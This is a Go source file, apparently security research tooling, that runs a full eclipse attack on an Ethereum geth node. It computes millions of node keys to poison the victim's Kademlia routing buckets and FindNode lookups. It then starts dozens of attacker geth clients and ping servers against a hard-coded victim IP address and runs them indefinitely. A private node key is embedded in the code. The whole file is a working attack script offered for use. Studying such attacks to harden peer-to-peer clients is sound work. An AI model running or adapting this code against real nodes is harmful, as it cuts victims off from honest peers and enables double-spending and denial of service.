package main

import (
	"../gethTest"

	"bufio"
	"flag"
	"fmt"
	"os"
	"strconv"
	"strings"
	"time"
)

var (
	victimIP   string
	victimPort int
	ourUdpPort int
	ourTcpPort int

	keyDir          string
	findNodeKeyFile string
)

func init() {
	flag.StringVar(&victimIP, "victimIP", "141.20.33.237", "Victim IP address")
	flag.IntVar(&victimPort, "victimPort", 30303, "Victim port number")
	flag.StringVar(&keyDir, "keydir",
		os.Getenv("HOME")+"/ethAttack/keys/", "Private Key directory")
	flag.StringVar(&findNodeKeyFile, "dir", os.Getenv("HOME")+"/ethAttack/FindNodeKeys", "findNode key file")
	flag.Parse()
}

func startEclipseFull() {
	// fetch victim's ID
	fmt.Println("VictimIP:", victimIP, "VictimPort:", victimPort)
	fmt.Println("Fetch victim ID...")
	udpServer := gethTest.NewPingServer(victimIP, victimPort, 1556, ourTcpPort)
	udpServer.GeneratePrivateKey()
	udpServer.IsBucketAttacker = false
	udpServer.Start()
	time.Sleep(1 * time.Second) // wait a second to let udpServer fetch the target ID
	udpServer.Stop()

	k := gethTest.NewKademliaStorage(256, 1048576, 2)
	if _, err := os.Stat(findNodeKeyFile); err == nil {
		fmt.Println("Import keys for FindNode attack...")
		f, _ := os.Open(findNodeKeyFile)
		defer f.Close()
		scanner := bufio.NewScanner(f)
		for scanner.Scan() {
			line := scanner.Text()
			lineSlice := strings.Split(line, " ")
			key, id := udpServer.ParsePrivatePublicKeyHex(lineSlice[0], lineSlice[1])
			k.Insert(id, key)
		}
	} else {
		fmt.Println("Calculate IDs for FindNode attack...")
		numKeys := 1048576 * 2
		for i := 0; i < numKeys; {
			if i%10000 == 0 {
				fmt.Println("Progress: ", i, "/", numKeys)
			}
			udpServer.GeneratePrivateKey()
			key := udpServer.PrivateKey()
			id := udpServer.NodeIDHashed()
			if k.Insert(id, key) == false {
				i++
			}
			k.Insert(id, key)
		}
	}

	// check whether table-attack key dir exists
	if _, err := os.Stat(keyDir); err == nil {
		fmt.Println("Table attack IDs already calculated.")
	} else {
		// generate an ID for each bucket
		fmt.Println("Calculate IDs for Table attack...")
		q := gethTest.NewTableStorage(1) // max one key per bucket, because we won't need more
		for q.KeysTotal() < 17 {
			udpServer.GeneratePrivateKey()
			q.Add(udpServer.PrivateKey(), udpServer.BucketNumber())
		}
		q.WriteKeysToFolder(keyDir)
	}

	// start ping servers
	fmt.Println("Start udp servers and geth-clients...")
	findNodeAttackerPort := 9100
	for i := 0; i < 17; i++ {
		s := gethTest.NewPingServer(victimIP, victimPort, 30303+i, 30303+i)

		binary := os.Getenv("HOME") + "/ethAttack/geth-attacker-outgoing/build/bin/geth"
		nodekeyhex := "259eb4728046ae73f91e06babc52c3159e0cd65cefdc8e49b67b9b5cf551d9e4"
		for i := 0; i < 2; i++ {
			datadir := os.Getenv("HOME") + "/ethAttack/geth-" + strconv.Itoa(findNodeAttackerPort)
			gethClient := gethTest.NewGethClient(binary, datadir, nodekeyhex, findNodeAttackerPort)
			gethClient.Start()
			s.GethClients = append(s.GethClients, gethClient)

			findNodeClient := gethTest.NewPingServer(victimIP, victimPort, findNodeAttackerPort, findNodeAttackerPort)
			findNodeClient.GeneratePrivateKey()
			findNodeClient.IsBucketAttacker = false
			s.FindNodeClients = append(s.FindNodeClients, findNodeClient)

			findNodeAttackerPort++
		}
		privateKeyFile := keyDir + strconv.Itoa(i) + "_0"
		s.ParsePrivateKeyFile(privateKeyFile)
		nodekeyhex = fmt.Sprintf("%x", s.PrivateKey().D)

		datadir := os.Getenv("HOME") + "/ethAttack/geth-" + strconv.Itoa(30303+i)
		gethClient := gethTest.NewGethClient(binary, datadir, nodekeyhex, 30303+i)
		gethClient.Start()
		s.BucketAttackGeth = gethClient

		s.SetKademliaStorage(k)
		s.Start()
	}

	fmt.Println("Attack started.")

	time.Sleep(3000 * 24 * time.Hour)
}

func main() {
	startEclipseFull()
}
